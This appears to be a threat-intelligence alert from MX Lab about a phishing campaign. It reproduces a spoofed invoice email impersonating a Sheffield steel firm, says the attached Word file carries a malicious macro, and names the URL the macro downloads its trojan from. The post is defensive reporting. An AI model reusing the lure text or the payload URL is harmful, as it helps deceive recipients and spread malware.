MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Documentation: Your Order Ref: SGM249/013”.
This email is send from the spoofed address “Jonathan Carroll <Jonathan@john-s-shackleton.co.uk>” and has the following body:
Your Order: SGM249/013
Our Order: 345522
Advice Note: 355187
Despatch Date: 22/12/15
s547369.DOC Shackleton Invoice Number 355187
John S. Shackleton (Sheffield) Ltd
4 Downgate Drive
Tel: 0114 244 4767
Fax: 0114 242 5965
Phone us for a free stock brochure.
Our product range includes: Beams, Columns, Pfc’s, Channels, Flats, Rounds, Squares, Angles, Tees, Convex, ERW Tubes, Hollow Section, Cold Reduced Sheet, Hot Rolled Sheet Galvanised Sheet, Zintec Sheet, Floorplate, Open Mesh Flooring, Handrail Standards, Tube, Tubeclamps. Welded Mesh, Expanded Metal, Perforated Sheet, U Edging, Fencing and Bright Bar.
Our Terms and Conditions of Sale apply to all quotations and the supply of all goods. Copies of our Terms and Conditions of Sale are available on request or can be found on our website www.johnsshackleton.co.uk . These Terms and Conditions include a provision (see term 12) that title to goods supplied shall not pass to a customer until payment is received by us in full for all goods supplied. We only accept orders for the supply of goods on the basis our Terms and Conditions of Sale apply.
The attached file s547369.DOC is a Word file with embedded malicious macro.
The malware is detected as HEUR.VBA.Trojan, Trojan:W97M/MaliciousMacro.GEN or heur.macro.download.cc by 4 the 54 AV engines at Virus Total.
Malware is downloaded by the macro from wattplus.net/98g654d/4567gh98.exe
The file 4567gh98.exe is detected as Trojan.Win32.Injector.cdgy (v), PE:Malware.Obscure!1.9C59 [F] or UDS:DangerousObject.Multi.Generic by 6 of the 55 AV engines at Virus Total.